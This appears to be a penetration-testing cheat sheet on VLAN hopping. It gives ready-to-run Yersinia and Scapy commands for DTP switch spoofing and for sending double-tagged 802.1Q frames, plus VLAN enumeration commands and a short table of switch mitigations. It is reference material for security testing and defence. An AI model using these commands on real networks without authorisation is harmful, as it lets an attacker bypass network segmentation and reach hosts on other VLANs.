Overview
VLAN hopping allows attacker to access traffic on other VLANs without routing. Two main techniques: switch spoofing (DTP) and double tagging.
Switch Spoofing (DTP Abuse)
Negotiate trunk port with switch via DTP.
Yersinia
yersinia dtp -attack 1 -interface eth0
Manual with Scapy
from scapy.all import *
from scapy.contrib.dtp import *
negotiate_trunk(iface="eth0")
After Trunk Established
# Create VLAN interface
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN up
dhclient eth0.TARGET_VLAN
Or manually:
ip link add link eth0 name eth0.100 type vlan id 100
ip addr add 10.10.100.10/24 dev eth0.100
ip link set eth0.100 up
Now can reach hosts on VLAN 100.
Double Tagging
Encapsulate frame in two 802.1Q tags. Outer tag matches native VLAN, inner tag is target VLAN.
One-way only — no return traffic. Useful for blind attacks (e.g., injecting into target VLAN).
Scapy
from scapy.all import *
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(packet, iface="eth0")
Requirements
- Attacker on native VLAN (untagged)
- Switch doesn’t strip outer tag before forwarding
- Target VLAN known
VLAN Enumeration
Wireshark
Look for 802.1Q tagged frames to identify VLANs.
Nmap
nmap --script=broadcast-listener -e eth0
CDP/LLDP
tcpdump -i eth0 -nn -v 'ether proto 0x88cc' # LLDP sniff
tcpdump -i eth0 -nn -v 'ether dst 01:00:0c:cc:cc:cc' # CDP sniff
yersinia cdp -attack 0 -interface eth0 # SEND a CDP packet (not a sniff)
Mitigation
| Defense | Description |
|---|
| Disable DTP | switchport nonegotiate |
| Access mode | switchport mode access on all ports |
| Native VLAN | Change from VLAN 1 to unused VLAN |
| VLAN pruning | Only allow needed VLANs on trunks |
Quick Reference
| Attack | Method |
|---|
| DTP abuse | yersinia dtp -attack 1 → negotiate trunk |
| Access VLAN | vconfig add eth0 VLAN_ID after trunk |
| Double tag | Scapy: Dot1Q(native)/Dot1Q(target) — one-way only |
| Enumerate | Wireshark vlan filter, CDP/LLDP sniff |